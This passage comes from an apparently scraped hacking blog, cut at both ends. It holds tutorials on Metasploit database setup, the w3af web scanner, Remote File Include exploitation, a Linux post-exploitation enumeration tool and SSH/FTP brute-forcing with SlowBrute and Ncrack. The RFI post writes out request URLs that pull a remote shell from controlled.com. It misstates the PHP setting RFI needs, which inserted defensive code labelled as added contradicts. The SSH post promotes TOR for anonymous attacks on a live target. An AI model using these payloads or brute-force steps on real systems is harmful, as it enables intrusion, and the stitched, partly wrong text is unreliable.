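    if mode & stat.S_IROTH:
        problems.append("world-readable")
    return problems


def problems_for_mode(mode):
    """Demo helper: write the sample to a temp file with the given mode and check it."""
    fd, path = tempfile.mkstemp()
    try:
        with os.fdopen(fd, "w") as fh:
            fh.write(SAMPLE_DATABASE_YML)
        os.chmod(path, mode)
        return permission_problems(path)
    finally:
        os.unlink(path)


if __name__ == "__main__":
    cfg = parse_simple_yml(SAMPLE_DATABASE_YML)
    print(db_connect_line(cfg))
    print("0644:", problems_for_mode(0o644))   # ['group-readable', 'world-readable']
    print("0600:", problems_for_mode(0o600))   # []
```

<div align="LEFT" style="margin-bottom: 0in;">
msfconsole can also read the file directly with “db_connect -y /path/to/database.yml”, so the composed line is mainly useful when you move the credentials somewhere else.</div>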
<div align="LEFT" style="margin-bottom: 0in;">
<br /></div>
<div align="LEFT" style="margin-bottom: 0in;">
You can simply type “HELP” or “?” at the command prompt now and you will
find that you have the full set of database command options in addition to
the standard options. Moving forward, all scans run through the Metasploit
console will be stored in our PostgreSQL database for re-use afterwards. This
brings us great advantages when working with tools like NMAP and
vulnerability scanners like Nessus and Nexpose, which can be imported
directly into the database or run directly from the msfconsole.
</div>
<div align="LEFT" style="margin-bottom: 0in;">
<br /></div>
<div align="LEFT" style="margin-bottom: 0in;">
This concludes my introduction to setting up a standalone Metasploit instance
with working database connections. I will have follow-up tutorials coming in
the next week to outline how we can install Nessus and incorporate it into
Metasploit, as well as how to do the same with Nexpose. I hope you enjoyed
this short tut and found some piece of it informative.</div>
<div align="LEFT" style="margin-bottom: 0in;">
<br /></div>
<div align="LEFT" style="margin-bottom: 0in;">
Until
next time, Enjoy!</div>
<div align="LEFT" style="margin-bottom: 0in;">
<br /></div>
<div align="LEFT" style="margin-bottom: 0in;">
<b>SPECIAL NOTE: </b>In the past you used to be able to configure standalone
database servers, but HD has stopped official support for all db_driver
options other than PostgreSQL, so this is your only real option these days
(no more MySQL support). You can install your own separate PostgreSQL
instance, use pgadmin3 to manage it, and give MSF the proper credentials to
connect that way, but when everything is already bundled there is no need to
re-invent the wheel...</div>
<div align="LEFT" style="margin-bottom: 0in;">
<br /></div>
<div align="LEFT" style="margin-bottom: 0in;">
<br /></div>HRhttp://www.blogger.com/profile/05957795383670307007noreply@blogger.com1tag:blogger.com,1999:blog-8671806905307905831.post-29005019582953051382012-07-02T12:01:00.000-05:002012-07-02T12:02:44.236-05:00Introduction to Web Application and Audit Framework, a.k.a. W3AF<br />
Today I am going to give you a brief introduction to a really great open source web scanner known as the <b>Web Application and Audit Framework</b>, or <b>W3AF</b> for short. It is coded in Python, has both a console and a GUI version, and is capable of mapping out a target site, testing for vulnerabilities, and even exploiting those vulnerabilities in some cases. I will focus on the console version and provide videos at the end for both versions. This way you will get a better understanding of the structure and how it works, as the GUI works the same way and is fairly easy to pick up after stumbling through a few scans. In order to get started, though, you need to make sure your system meets the pre-requisites for the tool to work.<br />
<br />
<b>Pre-requisites are:</b><br />
- w3af: <a href="http://w3af.sourceforge.net/">http://w3af.sourceforge.net/</a><br />
- python 2.6+<br />
- pybloomfilters<br />
- python-dev<br />
- half a brain :p<br />
<br />
Installation is covered in the w3af user guide so I won't cover it here; it works the same as most of the other applications we have installed for the other tutorials I have covered so far...<br />
<br /><b>NOTE:</b> if you experience issues with installing bloomfilters or missing Python.h files during the pre-requisite installs, don't worry, I had to fight them myself. The bloomfilter link is provided in the error message from the w3af install script and it is easy enough to install. If you experience issues around missing Python.h during any gcc builds during the installation process, you will need to use your package manager to install "python-dev", which installs the required Python header support for your system and solves the problem once you re-run the install commands. Aside from these two issues installation follows the w3af documentation exactly and is fairly pain free.<br />
<br />
Now that you have your system pre-requisites installed you can get things going by starting the console script with the help option from the install folder, like so:<br />
./w3af_console --help<br />
<br />
You should be greeted by the w3af menu options and command prompt.<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="http://i.imgur.com/piq5v.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="292" src="http://i.imgur.com/piq5v.jpg" width="400" /></a></div>
<br />
You can drop the "--help" and run without any arguments to get started; just choose console or GUI based on your need (we're focusing on console for now). Once you launch the console app you will drop into a w3af shell and the command prompt will change slightly. You are now in the framework, which works very similarly to the other Rapid7 framework, Metasploit. The w3af framework is broken into functional sections, and plugins handle the work within each section, passing their results to the next in line. You need to configure your profile and/or plugins along with any target or misc items you want before running a scan. We'll walk through this process now, starting from the initial w3af console command prompt, so you can better understand how it works.<br />
<br />
When you are in the w3af console mode your two best friends are going to be the "help" and "view" commands. These will display the menu for each section or list of possible config options in sub-sections. There are also a few hot keys you can use to save time and make navigation in console mode a little easier.<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="http://i.imgur.com/k5MbV.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="292" src="http://i.imgur.com/k5MbV.jpg" width="400" /></a></div>
<br />
Now in order to get started we need to configure our scan options how we like them. You simply type the name of the section you wish to jump into and the w3af command prompt will change, indicating you have successfully jumped sections. You can then issue a new "help" or "view" command to see what is available within the new section. We can run through them in the typical order I might approach things in. First we need to set our target configuration. If you type "target" and hit enter it will take you into the target sub-section. If you type "help" you can see a listing of all command options, and if you type "view" the available options for target configuration are presented. In order to set a config setting we simply need to type "set &lt;config-setting&gt; &lt;enter-value&gt;" and hit enter. You will need to do this multiple times until all items have been configured. You can use the view command again when done to verify things were properly updated. If you have multiple targets or values to set for an option you can simply enter them as a comma separated list. Once you are done you can simply type "back" to move back to the previous menu section to continue configuring.<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="http://i.imgur.com/ZG9K0.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="292" src="http://i.imgur.com/ZG9K0.jpg" width="400" /></a></div>
<br />
Once your target is set you will want to make a few adjustments to some of the framework's default settings under "http-settings" and "misc-settings". I start with misc-settings, where you can update the path to Metasploit; if you want to use any of the MSF payload options later this needs to be correct. Follow the same process as used for the target configuration: "set msf_location &lt;/path/to/msf3&gt;" and hit enter. You may also want to reduce the "maxThread" count to 1. You don't have to, but I find that, while a touch slower, the lower thread counts tend to be less prone to errors. You can also enter "nonTargets" if you have sensitive systems on the network you wish to leave out of the scan. You can also adjust a few fuzzing options and interface options here as well.<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="http://i.imgur.com/WgMYR.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="335" src="http://i.imgur.com/WgMYR.jpg" width="400" /></a></div>
<br />
Next we move back and then into the http-settings menu where we make a few more minor adjustments. The most notable change I make here is to swap out the default "userAgent" string. You will find some admins have blocked this UA string completely, so I like to swap it out for something from http://www.useragentstring.com/pages/useragentstring.php, often just choosing the latest Chrome or Firefox user-agent string unless there is a need to mimic another browser type for custom applications or something like that. If your target site requires authentication or you want to run as deep a scan as possible you can also enter your authentication credentials in this section, which will be used as plugins come across secure areas. You may find in some instances you need to be authenticated to find certain vulnerabilities; both NTLM and basic authentication methods are supported. You can also choose to enable or link to a local proxy, which allows you to hand off manual inspection to certain plugins in the framework. When done, go back to the main menu using the "back" command or the CTRL+D shortcut.<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="http://i.imgur.com/lfYkH.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="225" src="http://i.imgur.com/lfYkH.jpg" width="400" /></a></div>
<br />
Next we can choose to use a pre-built profile for scanning, or we can configure the plugins how we like and run a scan from there. If you want to see the profile options, simply type "profiles" from the main menu prompt to drop into the profiles sub-section. You can type "list" to see a listing of the available profiles. The names and descriptions should let you tell which is which and what its purpose is. If you want to use a pre-built profile, simply type "use <profile-name>" and it will set up the framework to use this profile at scan time.<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="http://i.imgur.com/RqQrj.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="225" src="http://i.imgur.com/RqQrj.jpg" width="400" /></a></div>
<br />
<br />
Alternatively we can skip profiles and move straight to the "plugins" sub-section from the main menu, configure things how we like and then run the scan. Once you enter the plugins menu you want to type "help" to see what is available. You can then type "list <plugin-name>" to see a list of the options under each plugin. I will walk through configuration of the output plugin; all others follow the same method for configuration, so you should be able to figure it out (the videos show more detail). So to configure output options we first type "list output" to see what's available. You may or may not have anything already configured, but any settings we set will override existing ones, so it's not really a big deal. We have a few ways to configure options. You can simply type the plugin name followed by a comma-separated list of options we want enabled (output console,csv_file,htmlFile,etc) and all items in the list will be enabled. You can use the "!" character as a NOT operator to keep an option from being included, which is handy if you use the shortcut "all" option to enable all plugins (ex: output all,!xmlFile,!emailReport,!export_requests would enable all but the xml, email, and export options).<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="http://i.imgur.com/4lFqe.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="225" src="http://i.imgur.com/4lFqe.jpg" width="400" /></a></div>
<br />
You may also notice that on some options there is a "conf" column with "yes" in it. This indicates there are configurable options for this plugin option. If you want to review or alter them, it works similar to what we have been doing already: you type "<plugin> config <option>" to enter the configuration menu. Once in the configuration menu it works like the others, where you can use "view" and "set" to list and set config options.<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="http://i.imgur.com/HZApn.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="225" src="http://i.imgur.com/HZApn.jpg" width="400" /></a></div>
<br />
<br />
Rinse, wash and repeat for all plugins until you have it configured how you like. Then you just type "start" to launch your scan. The scan will run in the terminal and, depending on your output options, it may or may not display everything it's doing for you. You can interpret the results as they fly across the screen or wait until it is fully finished and analyze the reports from the output files (if you enabled them). You can then choose to manually exploit as you like, hand off to other tools or frameworks, or in some cases continue on with w3af and fully exploit the vulnerabilities using some of w3af's built-in tools. W3af has exploitation techniques for handling SQL injections with a SQLMAP wrapper, has xpath injection, OS command injection shell, LFI and RFI exploitation tools, as well as tools for exploiting weak webDAV functions and misconfigured eval functions.<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="http://i.imgur.com/36mIC.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="225" src="http://i.imgur.com/36mIC.jpg" width="400" /></a></div>
<br />
If your scan found a vulnerability, simply run the exploit tool with the exploit plug-in matching the finding and it will do its thing. You can see a demo I put together from scan to root using both the console and GUI versions here:<br />
<br />
<b>CONSOLE Mode VIDEO Demo:</b> <a href="http://www.youtube.com/watch?v=ZQFpwTHMrxM">http://www.youtube.com/watch?v=ZQFpwTHMrxM</a><br />
<br />
<b>GUI Mode VIDEO Demo:</b> <a href="http://www.youtube.com/watch?v=dGX1KqlEEUk">http://www.youtube.com/watch?v=dGX1KqlEEUk</a><br />
<br />
<br /><strong>Remote File Include (RFI) Exploitation</strong> (HR, 2012-05-15)<br />Remote File Includes (a.k.a. RFI) work in the same way Local File Includes (LFI) work, the main difference being that instead of including local pages we will actually try to include remote pages from a different site and domain. The flaw is the same as LFI vulns but requires not only allow_url_fopen to be ON but also requires allow_url_include to be OFF. <br />
<br />
<strong>LFI:</strong> allow_url_fopen = On<br />
<strong>RFI:</strong> allow_url_include = Off<br />
<br />
When these conditions are right we can perform a Remote File Inclusion with disastrous effects on the target site, just as you have seen in the past with LFI. We can include PHP code from a remote site and use it to perform command execution on the target site and ultimately leverage it to perform a full system compromise. <br />
<br />
RFI technique can be used with straight inclusions:<br />
<blockquote class="tr_bq">
<?php<br />
$page = $_GET['page']; <br />
include($page);<br />
?> </blockquote>
<br />
As well as with NULL byte inclusions where we need to kill an appended file extension or similar:<br />
<blockquote class="tr_bq">
<?php<br />
$page = $_GET['page']; <br />
include($page . ".php");<br />
?></blockquote>
Now in order to properly get our code injected or included we need to keep it stored on a site we control, and we need to keep it in text format as opposed to standard PHP file format (i.e. shell.txt instead of shell.php). We replace the vuln link in our target site with a reference to our remote controlled site (<a href="http://controlled.com/shell.txt">http://controlled.com/shell.txt</a>). I should note that we add a "?" to the end of our request link, which will tell the target vuln server to interpret what follows as executable code. Our final exploit request link looks like this:<br />
<br />
Straight Include:<br />
<a href="http://target.com/vuln.php?page=http://controlled.com/shell.txt">http://target.com/vuln.php?page=http://controlled.com/shell.txt</a>?<br />
<br />
OR, to kill the appended extension, you might try a NULL byte:<br />
<a href="http://target.com/vuln.php?page=http://controlled.com/shell.txt">http://target.com/vuln.php?page=http://controlled.com/shell.txt</a>?;<br />
<a href="http://target.com/vuln.php?page=http://controlled.com/shell.txt?">http://target.com/vuln.php?page=http://controlled.com/shell.txt?</a><br />
<br />
Depending on which technique you use you should find (if vuln) that your remote code is now being included on the target page. The above code examples would now be resolving the "$page" variable like so:<br />
<br />
Straight Include: include('http://controlled.com/shell.txt'); <br />
OR<br />
NULL Byte Include: include('http://controlled.com/shell.txt?/.php'); <br />
<br />
This results in our code now being included, placing our remote code actively on the immediate page. If you can't execute code you won't be able to do much other than including Google, which is still vuln, but you need to include a full-featured shell or place custom code on your remote controlled host to compromise things and make a permanent impact on the target server.<br />
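The defender's side of the same bug, as an added example that is not code from the original post: a small Python checker that parses web-server access-log lines (constructed here; the parameter name page and the hostnames mirror the post's own examples), flags include-style parameters that carry a remote scheme, the trailing "?", an encoded NUL byte or a traversal sequence, and shows the allow-list lookup that is the usual fix for include($page). The PAGES mapping and the log lines are assumptions made for the demo. On the PHP side, the setting that governs whether include() will open a URL at all is allow_url_include; keeping it Off (its default since PHP 5.2) and disabling allow_url_fopen where the application does not need it removes the remote path entirely.

```python
"""Spot remote-file-include probes in web access logs, and the allow-list fix.

Added example; not code from the original post.  The access-log lines are
constructed; the parameter name "page" and the hostnames follow the post.
"""
import re
from typing import Dict, List, Optional
from urllib.parse import parse_qsl, unquote, urlsplit

# Constructed combined-log-format lines.  Only the request part is inspected.
ACCESS_LOG = """\
198.51.100.7 - - [15/May/2012:10:10:00 -0500] "GET /vuln.php?page=about HTTP/1.1" 200 512
198.51.100.7 - - [15/May/2012:10:10:05 -0500] "GET /vuln.php?page=http://controlled.com/shell.txt? HTTP/1.1" 200 3021
198.51.100.7 - - [15/May/2012:10:10:09 -0500] "GET /vuln.php?page=http%3A%2F%2Fcontrolled.com%2Fshell.txt%00 HTTP/1.1" 200 3021
203.0.113.9 - - [15/May/2012:10:11:00 -0500] "GET /vuln.php?page=../../etc/passwd HTTP/1.1" 200 1207
203.0.113.9 - - [15/May/2012:10:11:30 -0500] "GET /vuln.php?page=contact HTTP/1.1" 200 499
"""

LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>\S+) (?P<uri>\S+) [^"]*"')

# Stream wrappers include() will open when allow_url_include is On.
REMOTE_SCHEMES = ("http://", "https://", "ftp://", "ftps://", "php://", "data:", "expect://")


def classify_include_value(value: str) -> List[str]:
    """Return the reasons a parameter value looks like an include attack.

    An empty list means the value looks benign.  unquote() is applied so the
    function also works on a raw, still-encoded value.
    """
    v = unquote(value)
    reasons = []
    if v.lower().startswith(REMOTE_SCHEMES):
        reasons.append("remote scheme")
    if v.endswith("?"):
        reasons.append("trailing '?' to swallow appended suffix")
    if "\x00" in v:
        reasons.append("NUL byte to truncate appended suffix")
    if ".." in v.replace("\\", "/").split("/"):
        reasons.append("directory traversal")
    return reasons


def scan_access_log(text: str, params=("page",)) -> List[Dict]:
    """Parse each request line and flag suspicious values of the watched params."""
    findings = []
    for line in text.splitlines():
        m = LOG_RE.match(line)
        if not m:
            continue
        query = urlsplit(m["uri"]).query
        for name, value in parse_qsl(query, keep_blank_values=True):
            reasons = classify_include_value(value) if name in params else []
            if reasons:
                findings.append({"ip": m["ip"], "ts": m["ts"], "param": name,
                                 "value": value, "reasons": reasons})
    return findings


# The fix pattern: the request names a key, the server picks the file.
PAGES = {"about": "pages/about.php", "contact": "pages/contact.php"}  # assumed layout


def resolve_page(requested: str, pages: Dict[str, str] = PAGES) -> Optional[str]:
    """Allow-list lookup replacing include($page): unknown keys get None,
    so a URL, a traversal string or a NUL byte can never reach include()."""
    return pages.get(requested)


if __name__ == "__main__":
    for f in scan_access_log(ACCESS_LOG):
        print(f"{f['ip']:14s} {f['param']}={f['value']!r}: {', '.join(f['reasons'])}")
```

Run as a script it prints the three offending requests; the two benign ones (page=about, page=contact) produce nothing, and those are exactly the keys resolve_page() accepts. The checker decodes the parameter once, the same way the web server does before PHP sees it, which is why the %00 and %3A%2F%2F variants are caught alongside their literal forms.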
<br />
Here is a brief video I made to demonstrate how things should work for you if you come across this in one of your audits:<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<iframe allowfullscreen='allowfullscreen' webkitallowfullscreen='webkitallowfullscreen' mozallowfullscreen='mozallowfullscreen' width='320' height='266' src='https://www.blogger.com/video.g?token=AD6v5dxxBQ2qr8jassPvu3i6GMFKlB7wuvjYX-fTB9wv9o67Mv1umRD_nV_UhWSVk6sQphLYb1hx2zMw8qjcVEmW' class='b-hbp-video b-uploaded' frameborder='0'></iframe></div>
<br />
Hope you enjoyed the show....<br />
<br />
Until next time, Enjoy!<br /><br /><strong>The Inf0rm3r - Linux Enumeration Script</strong> (HR, 2012-05-15)<br />Hey Guys,<br />
<br />
I am back and apologize for the lack of activity last month; life has been crazy lately. As some of you may or may not know, I've been trying to step up my post-exploitation skills as well as my general Linux skills. I recently jumped to Linux for my main day-to-day OS and have to say I've never been happier (other than Camtasia doesn't run on Linux). Anyway, I started looking into common tasks one should perform after gaining shell access in order to increase one's chances of gaining root access, and decided to try and write my first Linux script to help myself; since I <3 my supporters I decided to share it with you guys as well. Now everyone can download and run an exploit and cross their fingers and hope it works, but what if it doesn't? What if we still want to try and root the box? There are many methods one can use to gain root access without pre-compiled exploits. I will link you to a great reference guide for some basic methods one can use to go about searching for ways to gain root access, and then I will give you my new script, which will try to take some of the pain out of the process by quickly identifying some key areas one can start looking at to get things done and/or dig out a bit more info. The tool for now only does pure enumeration, but I do have a few ideas for a private version which will continue development into the future, who knows though. That being said, I give you the following which I have available now:<br />
<br />
A really good newbie guide to actual rooting methods with some understandable examples: <br /><a href="http://www.dankalia.com/tutor/01005/0100501004.htm">http://www.dankalia.com/tutor/01005/0100501004.htm</a><br />
<br />There are many other write-ups out there if you search hard and do some reading. This is just a tool give-away, not a how-to-root-the-box thread. I will try to continue posting more post-exploitation techniques as time allows in the near future...<br />
<br />
<strong>To the Point - Downloads:</strong><br />
<div>
<strong>ZIP Download:</strong> <a href="http://uppit.com/le477muzng7f/Inf0rm3r.zip">http://uppit.com/le477muzng7f/Inf0rm3r.zip</a></div>
Inf0rm3r.zip contains the following:<br />
<strong>Inf0rm3r.sh:</strong><br />
<ul>
<li> Actual bash script which does the enumeration magic and can be run on its own</li>
</ul>
<strong>fetch3r:</strong><br />
<ul>
<li> Side project from Inf0rm3r: a C-based app which remotely grabs the Inf0rm3r script, runs it, and deletes it so all that is left is the report file. It also produces no output in the terminal, so it can be easier on some systems (CentOS for example, which has buffer size issues due to the size being set at compile time)</li>
</ul>
<div>
<strong>SCRIPT SOURCE:</strong> <a href="https://pastee.org/b4gtz">https://pastee.org/b4gtz</a></div>
<ul>
<li><strong>PASS:</strong> I<3INTRA!</li>
</ul>
I also made a brief<strong> DEMO VIDEO</strong> to highlight it in action so you get an idea for what all it captures, have a look see:<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<iframe allowfullscreen='allowfullscreen' webkitallowfullscreen='webkitallowfullscreen' mozallowfullscreen='mozallowfullscreen' width='320' height='266' src='https://www.youtube.com/embed/omailZHuQAY?feature=player_embedded' frameborder='0'></iframe></div>
<br />
<br />
<br /><strong>NOTE:</strong> There is a function already in place to handle emailing of the report file if you're running the standalone script. You just need to uncomment the code in the script and then pass an email address to the script as an argument when you run it. It requires /bin/mail from mailutils to be installed to work. I didn't get this properly installed and set up locally, so my testing only validated the logic, not the actual emailing itself, although I had a buddy state it was working for him, so it's up in the air for now (hence it being commented out for this release version; we will see what the future brings). <br />
<br />
Big Shout-out and special thanks to Phaedrus for helping me out with a few live test environments to fine tune a few things and th3breacher for some of the email code, suggestions and feedback!<br />
<br />
...and of course, Greetz to and from everyone in INTRA!<br />
<br />
If you have any questions, suggestions or feedback of any kind do let me know as I want to improve this over time to really be something unique and handy for the community to have.<br />
<br />
<strong>Until next time, Enjoy the pursuit for r00t!</strong><br /><br /><strong>Slow Brute SSH a.k.a. slowbrute.py - A Python Based SSH Cracker, that works!</strong> (HR, 2012-03-19)<div class="MsoNormal" style="line-height: normal; margin: 0in 0in 0pt;"><span style="font-family: Calibri;">OK, so today I will provide you with a quick introduction to a really awesome SSH cracker based on Python, called Slow Brute SSH. It is Python-based but is still a Linux-only script which performs targeted dictionary attacks against a specific SSH user instance. It has the ability to execute commands upon success and has an amazing success detection rate. I ran into problems using NCRACK myself and was looking for something better for this protocol. I tested 4-5 of the better known SSH cracking tools out there and this was the one that received my top rating, mainly due to its simplistic design and easy usability. Many of the other tools I reviewed required different versions of LibSSH to be installed, particularly non-standard versions. This leads to tricky installations with tons of pre-requisites in order to get things working. This tool works well right out of the box, as it should. It also presents successful findings in a super easy-to-read format. Here goes the quick overview…</span></div><div class="MsoNormal" style="line-height: normal; margin: 0in 0in 0pt;"><br />
</div><div class="MsoNormal" style="line-height: normal; margin: 0in 0in 0pt;"><span style="font-family: Calibri;"><b style="mso-bidi-font-weight: normal;">DOWNLOAD:</b> </span><a href="http://packetstormsecurity.org/files/98803/Slow-SSH-Bruteforcer.html"><span style="font-family: Calibri;">http://packetstormsecurity.org/files/98803/Slow-SSH-Bruteforcer.html</span></a></div><div class="MsoNormal" style="line-height: normal; margin: 0in 0in 0pt;"><br />
</div><span style="font-family: "Calibri", "sans-serif"; font-size: 11pt; line-height: 115%; mso-ansi-language: EN-US; mso-ascii-theme-font: minor-latin; mso-bidi-font-family: "Times New Roman"; mso-bidi-language: AR-SA; mso-bidi-theme-font: minor-bidi; mso-fareast-font-family: Calibri; mso-fareast-language: EN-US; mso-fareast-theme-font: minor-latin; mso-hansi-theme-font: minor-latin;">Download and extract the tool to your Linux desktop (tar -zxvf downloadname). That’s it! It is now installed and ready to go; just jump into the folder and enter the usual “./slowbrute.py --help” to see the list of command options:</span> <br />
<div class="separator" style="clear: both; text-align: center;"><a href="http://i.imgur.com/wwYIw.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img aea="true" border="0" height="268" src="http://i.imgur.com/wwYIw.png" width="320" /></a></div><br />
<div class="MsoNormal" style="line-height: normal; margin: 0in 0in 0pt;"><span style="font-family: Calibri;">You can see the command syntax is fairly easy to use and pick up on. You can essentially just point and shoot and the tool does all the work, easy setup. If you want to use TOR network for added anonymity just turn on TOR prior to launching and then make sure you use the “-T” or “--tor” option to route through the standard TOR port and out to target. If SSH is running on a non-standard port (22) then you can use the “–d” argument to specify the port to attack on instead of the default, if not provided the tool will assume the standard port 22 on the target. Not a lot to this one folks, simple and works well…</span></div><div class="MsoNormal" style="line-height: normal; margin: 0in 0in 0pt;"><br />
</div><div class="MsoNormal" style="line-height: normal; margin: 0in 0in 0pt;"><span style="font-family: Calibri;">Here is a quick video to show you how it works in action against live target which NCRACK was unable to successfully register successful login against, hence this tutorial and tool highlight </span><span style="font-family: Wingdings; mso-ascii-font-family: Calibri; mso-ascii-theme-font: minor-latin; mso-char-type: symbol; mso-hansi-font-family: Calibri; mso-hansi-theme-font: minor-latin; mso-symbol-font-family: Wingdings;"><span style="mso-char-type: symbol; mso-symbol-font-family: Wingdings;">J</span></span></div><br />
<strong><span style="color: red;">Video up in next 24hrs....</span></strong><br />
<br />
<strong>Until next time, Enjoy!</strong><br /><br /><strong>NCRACK: The FTP/SSH/Telnet/HTTP(S)/POP3(S)/SMB/RDP & VNC Protocol Cracker</strong> (HR, 2012-03-19)<div class="MsoNormal" style="line-height: normal; margin: 0in 0in 0pt;"><span style="font-family: Calibri;">Ncrack is a network cracking tool that can perform brute-force/dictionary attacks across the network. It has a wide array of modules available, which makes it very versatile, and it is created and maintained by the same folks who gave us NMAP. Today I will show you how to use it to brute-force the FTP protocol. I will be performing this attack from a Windows 7 x64 machine and my target will be a *nix machine. The full documentation on Ncrack is available from the homepage and with the download, so I will only cover FTP for now, but other protocols follow a similar approach. Follow along and let the fun begin...</span></div><div class="MsoNormal" style="line-height: normal; margin: 0in 0in 0pt;"><br />
</div><div class="MsoNormal" style="line-height: normal; margin: 0in 0in 0pt;"><span style="font-family: Calibri;">Download for your particular OS of choice can be found here: <a href="http://nmap.org/ncrack/">http://nmap.org/ncrack/</a></span></div><div class="MsoNormal" style="line-height: normal; margin: 0in 0in 0pt;"><span style="font-family: Calibri;"><strong>NOTE:</strong> this is a command line only tool, so you will need to navigate to where you extract it to run it or add it to your path environmental details so you can run from any terminal or console window (my preference)</span></div><div class="MsoNormal" style="line-height: normal; margin: 0in 0in 0pt;"><br />
</div><div class="MsoNormal" style="line-height: normal; margin: 0in 0in 0pt;"><span style="font-family: Calibri;">OK, so once it is installed we do open command prompt and then navigate to our install location "CD path/ncrack", and then run a quick help check to see what options are available "ncrack -h", will look like this:</span></div><br />
<div class="separator" style="clear: both; text-align: center;"><a href="http://i.imgur.com/F3U87.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img aea="true" border="0" height="320" src="http://i.imgur.com/F3U87.png" width="299" /></a></div><br />
<div class="MsoNormal" style="line-height: normal; margin: 0in 0in 0pt;"><span style="font-family: Calibri;">The default syntax works like this: </span></div><div class="MsoListParagraph" style="line-height: normal; margin: 0in 0in 0pt 1in; mso-add-space: auto; mso-list: l2 level1 lfo7; text-indent: -0.25in;"><span style="font-family: Symbol; mso-bidi-font-family: Symbol; mso-fareast-font-family: Symbol;"><span style="mso-list: Ignore;">·<span style="font-family: "Times New Roman";"> </span></span></span><span style="font-family: Calibri;">ncrack [Options] {target and service specification}</span></div><div class="MsoNormal" style="line-height: normal; margin: 0in 0in 0pt;"><br />
</div><div class="MsoNormal" style="line-height: normal; margin: 0in 0in 0pt;"><span style="font-family: Calibri;">As you can see though, there are a lot of options available so let’s provide some clarification and then attack some targets. </span></div><div class="MsoNormal" style="line-height: normal; margin: 0in 0in 0pt;"><br />
</div><div class="MsoNormal" style="line-height: normal; margin: 0in 0in 0pt;"><b style="mso-bidi-font-weight: normal;"><span style="font-family: Calibri;">Identifying targets:</span></b></div><div class="MsoNormal" style="line-height: normal; margin: 0in 0in 0pt;"><span style="font-family: Calibri;">You can run scans however you want to find machines with open ports (typically you can do a quick check for port 21,22, 2222, and 3389).<span style="mso-spacerun: yes;"> </span>Once you have a target or a few you can tell NCRACK how to attack. We can use the tool to attack a single IP address or a whole range of IP addresses, using standard NMAP formatting of course. We can use the following flags for inputting IP addresses, all of which have their moments as to when they are useful:</span></div><div class="MsoListParagraphCxSpFirst" style="line-height: normal; margin: 0in 0in 0pt 0.5in; mso-add-space: auto; mso-list: l1 level1 lfo1; text-indent: -0.25in;"><span style="mso-bidi-font-family: Calibri; mso-bidi-theme-font: minor-latin;"><span style="mso-list: Ignore;"><span style="font-family: Calibri;">1.</span><span style="font-family: "Times New Roman";"> </span></span></span><span style="font-family: Calibri;">–iX path/to/file.xml</span></div><div class="MsoListParagraphCxSpMiddle" style="line-height: normal; margin: 0in 0in 0pt 1in; mso-add-space: auto; mso-list: l1 level2 lfo1; text-indent: -0.25in;"><span style="mso-bidi-font-family: Calibri; mso-bidi-theme-font: minor-latin;"><span style="mso-list: Ignore;"><span style="font-family: Calibri;">a.</span><span style="font-family: "Times New Roman";"> </span></span></span><span style="font-family: Calibri;">This takes the output from an NMAP scan where you have used the –oX flag to indicate you want the NMAP scan results to be saved in .XML format</span></div><div class="MsoListParagraphCxSpMiddle" style="line-height: normal; margin: 0in 0in 0pt 0.5in; mso-add-space: auto; mso-list: l1 level1 lfo1; text-indent: 
">
-0.25in;"><span style="mso-bidi-font-family: Calibri; mso-bidi-theme-font: minor-latin;"><span style="mso-list: Ignore;"><span style="font-family: Calibri;">2.</span><span style="font-family: "Times New Roman";"> </span></span></span><span style="font-family: Calibri;">-iN path/to/file</span></div><div class="MsoListParagraphCxSpMiddle" style="line-height: normal; margin: 0in 0in 0pt 1in; mso-add-space: auto; mso-list: l1 level2 lfo1; text-indent: -0.25in;"><span style="mso-bidi-font-family: Calibri; mso-bidi-theme-font: minor-latin;"><span style="mso-list: Ignore;"><span style="font-family: Calibri;">a.</span><span style="font-family: "Times New Roman";"> </span></span></span><span style="font-family: Calibri;">This takes the standard (normal) output file that NMAP saves from a scan</span></div><div class="MsoListParagraphCxSpMiddle" style="line-height: normal; margin: 0in 0in 0pt 0.5in; mso-add-space: auto; mso-list: l1 level1 lfo1; text-indent: -0.25in;"><span style="mso-bidi-font-family: Calibri; mso-bidi-theme-font: minor-latin;"><span style="mso-list: Ignore;"><span style="font-family: Calibri;">3.</span><span style="font-family: "Times New Roman";"> </span></span></span><span style="font-family: Calibri;">-iL path/to/file.txt</span></div><div class="MsoListParagraphCxSpLast" style="line-height: normal; margin: 0in 0in 0pt 1in; mso-add-space: auto; mso-list: l1 level2 lfo1; text-indent: -0.25in;"><span style="mso-bidi-font-family: Calibri; mso-bidi-theme-font: minor-latin;"><span style="mso-list: Ignore;"><span style="font-family: Calibri;">a.</span><span style="font-family: "Times New Roman";"> </span></span></span><span style="font-family: Calibri;">This takes a user-provided list of hosts or network ranges</span></div><div class="MsoNormal" style="line-height: normal; margin: 0in 0in 0pt;"><br />
